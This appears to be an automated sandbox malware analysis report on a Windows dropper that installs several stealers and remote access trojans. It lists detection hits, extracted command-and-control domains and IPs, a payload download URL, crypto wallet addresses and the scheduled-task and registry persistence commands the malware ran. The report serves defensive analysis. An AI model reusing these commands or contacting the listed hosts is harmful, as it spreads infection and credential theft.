42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
51.2.RegAsm.exe.436060.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
31.2.build2.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
51.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.3.build2.exe.2b60000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.build2.exe.2af0e67.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
46.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.build2.exe.2af0e67.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.3.build2.exe.2b60000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
51.2.RegAsm.exe.400000.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
51.2.RegAsm.exe.400000.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
51.2.RegAsm.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
51.2.RegAsm.exe.400000.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xc48f3:$s1: file:/// 0xc484f:$s2: {11111-22222-10009-11112} 0xc4883:$s3: {11111-22222-50001-00000} 0xc18ae:$s4: get_Module 0x52fe2:$s5: Reverse 0xbbf9c:$s5: Reverse 0xbcc97:$s6: BlockCopy 0xbbf6a:$s7: ReadByte 0xc4905:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
51.2.RegAsm.exe.482060.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
51.2.RegAsm.exe.482060.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
51.2.RegAsm.exe.482060.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43893:$s1: file:/// 0x437ef:$s2: {11111-22222-10009-11112} 0x43823:$s3: {11111-22222-50001-00000} 0x4084e:$s4: get_Module 0x3af3c:$s5: Reverse 0x3bc37:$s6: BlockCopy 0x3af0a:$s7: ReadByte 0x438a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ProcessId: 7720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cerker.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ProcessId: 7664, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 7732, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ProcessId: 7720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cerker.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Shipment.pif E, CommandLine: Shipment.pif E, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: Shipment.pif E, ProcessId: 7580, ProcessName: Shipment.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 7580, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ParentProcessId: 7720, ParentProcessName: kitty.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 7580, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 7732, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7680, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://thizx13vt.top/v	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpIq	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/g	Avira URL Cloud: Label: malware
Source: thizx13vt.top	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/j	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/x	Avira URL Cloud: Label: malware
Source: http://185.216.214.225/freedom.exe	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpM?	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top:80/v1/upload.phpraz	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.php%qN	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpsrJG	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/:F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/2	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/)	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/E	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/S	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/N	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 31.3.build2.exe.2b60000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}
Source: 3546345.exe.7096.37.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}

Multi AV Scanner detection for domain / URL

Source: thizx13vt.top	Virustotal: Detection: 5%	Perma Link
Source: 95.179.163.21:29257	Virustotal: Detection: 8%	Perma Link
Source: http://185.216.214.225/freedom.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Windows.exe	ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wfJfUGeGT3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: exonic-hacks.com
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 1920
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <123456789>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <Xwormmm>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: NewAged
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: USB.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: %Userprofile%
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: Windows.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: bc1qvjral4f3vdvgp4ep5al5a08zxl3ympwr208tef
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 0x8bF11EF53522Af8409ed77b05B1C5A0059F14571
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: TRC20_Address

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: exonic-hacks.com
Source: Malware configuration extractor	IPs: 193.176.158.185
Source: Malware configuration extractor	URLs: POST13vt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: +#thizx13vt.top
Source: Malware configuration extractor	URLs: 13vt.top
Source: Malware configuration extractor	URLs: thizx13vt.top
Source: Malware configuration extractor	URLs: t.top
Source: Malware configuration extractor	URLs: +thizx13vt.top
Source: Malware configuration extractor	URLs: 95.179.163.21:29257

Yara detected Generic Downloader

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

